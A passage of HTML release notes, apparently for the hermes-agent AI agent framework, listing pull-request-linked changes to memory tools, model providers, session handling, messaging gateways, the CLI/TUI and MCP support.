<li><strong><code>memory</code> batch operations</strong> — atomic add/replace/remove array against the final char budget, so a single call can free space and add entries (<a href="https://github.com/NousResearch/hermes-agent/pull/48507" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48507/hovercard">#48507</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>search_files</code> lossless densification</strong> — headroom evaluation report + the one densification improvement worth shipping (fewer tokens per result, same matches) (<a href="https://github.com/NousResearch/hermes-agent/pull/47866" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47866/hovercard">#47866</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Removed the agent-callable <code>send_message</code> tool; coding-context posture across CLI/TUI/desktop/ACP; <code>read_file</code> extracts <code>.ipynb</code>/<code>.docx</code>/<code>.xlsx</code> to text (<a href="https://github.com/NousResearch/hermes-agent/pull/47856" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47856/hovercard">#47856</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43316" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43316/hovercard">#43316</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37082" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37082/hovercard">#37082</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Context-file handling: configurable truncation limit + warnings; scale context-file cap to model window + point agent at the truncated file (<a href="https://github.com/NousResearch/hermes-agent/pull/47251" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47251/hovercard">#47251</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47846" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47846/hovercard">#47846</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Compression: temporal anchoring in compaction summaries; raise compaction trigger to 85% for gpt-5.5 on Codex OAuth (<a href="https://github.com/NousResearch/hermes-agent/pull/41102" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41102/hovercard">#41102</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40957" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40957/hovercard">#40957</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Adaptive middleware (consumed by NeMo-Relay observer telemetry); usable mid-turn steer — desktop affordance + trusted injection (<a href="https://github.com/NousResearch/hermes-agent/pull/29724" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29724/hovercard">#29724</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40240" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40240/hovercard">#40240</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Provider &amp; model support</h3>
<ul>
<li>New models: <code>z-ai/glm-5.2</code> (verified 1M context, OpenRouter + Nous), <code>anthropic/claude-fable-5</code>, <code>laguna-m.1</code> + <code>nemotron-3-ultra</code>, xAI Composer 2.5 in the OAuth picker; default xAI to <code>grok-build-0.1</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/47391" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47391/hovercard">#47391</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45695" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45695/hovercard">#45695</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42979" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42979/hovercard">#42979</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42629" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42629/hovercard">#42629</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47908" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47908/hovercard">#47908</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47371" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47371/hovercard">#47371</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Model picker: Refresh-Models control to bust stale cache; persist Nous recommended-models to disk + fall back on Portal failure; seed catalog disk cache from checkout on update; MiniMax-M3 reports true 1M context (<a href="https://github.com/NousResearch/hermes-agent/pull/48691" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48691/hovercard">#48691</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42628" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42628/hovercard">#42628</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42614" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42614/hovercard">#42614</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43338" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43338/hovercard">#43338</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Anthropic adaptive models: default to modern thinking contract; never send <code>reasoning</code> field; route <code>reasoning_effort</code> to verbosity; require confirmation for very expensive selections (<a href="https://github.com/NousResearch/hermes-agent/pull/42991" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42991/hovercard">#42991</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43012" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43012/hovercard">#43012</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43436" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43436/hovercard">#43436</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43391" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43391/hovercard">#43391</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Auth: auto-detect OpenRouter credential from the pool; keep Codex OAuth pool accounts distinct on add/re-auth; resolve xAI OAuth across profiles + write rotated tokens back to root; honor <code>model.default_headers</code> for custom OpenAI-compatible providers (<a href="https://github.com/NousResearch/hermes-agent/pull/42263" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42263/hovercard">#42263</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42316" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42316/hovercard">#42316</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46614" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46614/hovercard">#46614</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41096" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41096/hovercard">#41096</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Bedrock falls back to non-streaming <code>InvokeModel</code> when IAM denies the streaming variant; Ollama default <code>max_tokens=65536</code>; surface model refusals as <code>content_filter</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/44293" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44293/hovercard">#44293</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41694" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41694/hovercard">#41694</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46013" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46013/hovercard">#46013</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Sessions, state &amp; multi-agent</h3>
<ul>
<li>Optional <strong>max session cap</strong>; drop empty sessions on CLI exit and rotation; ACP session-provenance metadata for compression rotation (<a href="https://github.com/NousResearch/hermes-agent/pull/42389" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42389/hovercard">#42389</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43855" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43855/hovercard">#43855</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41724" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41724/hovercard">#41724</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Delegation: resolve custom-endpoint subagent pools by endpoint identity; remove the default subagent wall-clock timeout; stop subagent completion lines leaking into parent CLI display (<a href="https://github.com/NousResearch/hermes-agent/pull/41730" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41730/hovercard">#41730</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45149" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45149/hovercard">#45149</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44223" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44223/hovercard">#44223</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Kanban: config-gated auto-subscribe on <code>kanban_create</code>; machine-global singleton lock for the embedded dispatcher; pin assigned profile toolsets for workers; hold reclaim while worker still alive (<a href="https://github.com/NousResearch/hermes-agent/pull/48635" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48635/hovercard">#48635</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49068" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49068/hovercard">#49068</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45590" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45590/hovercard">#45590</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49064" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49064/hovercard">#49064</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Memory: configurable Hindsight retain observation scopes; OpenViking setup UX; Honcho gateway-gated identity tree; Supermemory session-level ingest (<a href="https://github.com/NousResearch/hermes-agent/pull/46611" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46611/hovercard">#46611</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48262" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48262/hovercard">#48262</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44431" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44431/hovercard">#44431</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38756/hovercard">#38756</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>)</li>
</ul>
<h2>📱 Messaging Platforms (Gateway)</h2>
<h3>New channels</h3>
<ul>
<li><strong>iMessage via Photon Spectrum</strong> — <code>hermes photon login</code> (device-code OAuth), gRPC-native channel (no webhook), markdown rendering, emoji reactions, outbound media via spectrum-ts (<a href="https://github.com/NousResearch/hermes-agent/pull/32348" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32348/hovercard">#32348</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42582/hovercard">#42582</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44713" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44713/hovercard">#44713</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42397" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42397/hovercard">#42397</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>WhatsApp Business Cloud API</strong> adapter (official, no bridge process) (<a href="https://github.com/NousResearch/hermes-agent/pull/44331" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44331/hovercard">#44331</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43921" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43921/hovercard">#43921</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>SimpleX</strong> — groups, native attachments, text batching, auto-accept; <strong>Raft</strong> bundled platform plugin with activity hooks (<a href="https://github.com/NousResearch/hermes-agent/pull/42584" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42584/hovercard">#42584</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48210" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48210/hovercard">#48210</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Gateway core &amp; rendering</h3>
<ul>
<li>Render terminal tool calls as native bash code blocks on markdown platforms; bare fenced code blocks in chat; optional message timestamps for LLM context; configurable <code>tool_progress_grouping</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41215" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41215/hovercard">#41215</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42576" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42576/hovercard">#42576</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47253" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47253/hovercard">#47253</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47228" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47228/hovercard">#47228</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Telegram: Bot API 10.1 rich messages (now always-on with opt-out); opt-in Online/Offline bot status indicator; stop cutting long streamed responses; MarkdownV2 on progress edits; gate oversized voice/audio before download (<a href="https://github.com/NousResearch/hermes-agent/pull/44829" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44829/hovercard">#44829</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45584" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45584/hovercard">#45584</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49134" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49134/hovercard">#49134</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43761" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43761/hovercard">#43761</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44245" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44245/hovercard">#44245</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Discord: propagate <code>role_authorized</code> so <code>DISCORD_ALLOWED_ROLES</code> works end-to-end; recover from runtime gateway task exits; cancel <code>_bot_task</code> on connect failure; stop typing after replies (<a href="https://github.com/NousResearch/hermes-agent/pull/43327" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43327/hovercard">#43327</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44383" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44383/hovercard">#44383</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44432" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44432/hovercard">#44432</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44836" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44836/hovercard">#44836</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Slack: scope top-level channel messages when <code>reply_in_thread=false</code>; thread approval UX (block-size overflow + typed-prefix); make video attachments available to agents; <code>register_slack_action_handler</code> plugin API (<a href="https://github.com/NousResearch/hermes-agent/pull/41703" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41703/hovercard">#41703</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43444" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43444/hovercard">#43444</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45512" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45512/hovercard">#45512</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44664" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44664/hovercard">#44664</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Replied-to media attachments included; document attachments classified as DOCUMENT on Signal/Email/SimpleX/Teams; WhatsApp restarts stale bridge processes; Matrix room-context isolation; QQbot CPU-spin fix; Weixin rate-limit circuit breaker (<a href="https://github.com/NousResearch/hermes-agent/pull/46107" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46107/hovercard">#46107</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44695" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44695/hovercard">#44695</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44205" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44205/hovercard">#44205</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/18505" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/18505/hovercard">#18505</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40574" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40574/hovercard">#40574</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41718" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41718/hovercard">#41718</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/banditburai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/banditburai">@banditburai</a>)</li>
</ul>
<h2>🖥️ CLI, TUI &amp; Setup</h2>
<ul>
<li><code>/version</code> slash command; <code>/billing</code> interactive terminal billing (TUI + CLI); show time since last final agent response on the status bar; persist resolved approval/clarify prompts in scrollback (<a href="https://github.com/NousResearch/hermes-agent/pull/40214" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40214/hovercard">#40214</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45449" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45449/hovercard">#45449</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44265" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44265/hovercard">#44265</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44702" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44702/hovercard">#44702</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Lock hermes worktrees so concurrent processes can't clobber them; display custom profile alias names in list/show; clone profiles from any source (<a href="https://github.com/NousResearch/hermes-agent/pull/48699" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48699/hovercard">#48699</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40371" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40371/hovercard">#40371</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45630" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45630/hovercard">#45630</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Opt-in structured profile-build path on first contact; configurable per-platform system-prompt hints; configurable background memory/skill notifications (<a href="https://github.com/NousResearch/hermes-agent/pull/41114" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41114/hovercard">#41114</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48630" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48630/hovercard">#48630</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47226" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47226/hovercard">#47226</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>TUI: interactive Plugins Hub enable/disable overlay; session name in the terminal titlebar; paint approval/clarify/sudo/secret modals directly (not via throttle); wrap long approval commands instead of truncating (<a href="https://github.com/NousResearch/hermes-agent/pull/42965" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42965/hovercard">#42965</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43188" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43188/hovercard">#43188</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41155" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41155/hovercard">#41155</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44691" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44691/hovercard">#44691</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>TTS: Gemini persona prompts + audio tags; xAI auto speech tags + speed/streaming knobs; Piper speaker_id; OGG for Telegram auto-TTS (<a href="https://github.com/NousResearch/hermes-agent/pull/43442" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43442/hovercard">#43442</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49061" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49061/hovercard">#49061</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49062" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49062/hovercard">#49062</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49060" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49060/hovercard">#49060</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41644" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41644/hovercard">#41644</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🔧 Tool System, Skills &amp; MCP</h2>
<ul>
<li><strong>image-to-image / editing</strong> in <code>image_generate</code> across all backends; shrink images to provider dimension limit (<a href="https://github.com/NousResearch/hermes-agent/pull/48705" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48705/hovercard">#48705</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45979" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45979/hovercard">#45979</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>MCP: official <strong>Unreal Engine 5.8</strong> MCP server in the catalog; <strong>elicitation handler</strong> so MCP servers can prompt for mid-tool-call confirmation (payment/OAuth) on whichever surface owns the session — CLI/TUI/Telegram/Slack; expose late-connecting MCP tools to the agent between turns (cache-safe); keepalive ping for short-TTL HTTP sessions; block exfil-shaped / suspicious stdio configs before probe; capability-gate <code>tools/list</code> so prompt-only servers connect; preserve stdio argv passthrough + Windows env vars (<a href="https://github.com/NousResearch/hermes-agent/pull/48397" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48397/hovercard">#48397</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49203" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49203/hovercard">#49203</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49208" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49208/hovercard">#49208</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49221" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49221/hovercard">#49221</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46083" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46083/hovercard">#46083</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44550" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44550/hovercard">#44550</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44324" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44324/hovercard">#44324</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lgalabru/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lgalabru">@lgalabru</a>)</li>
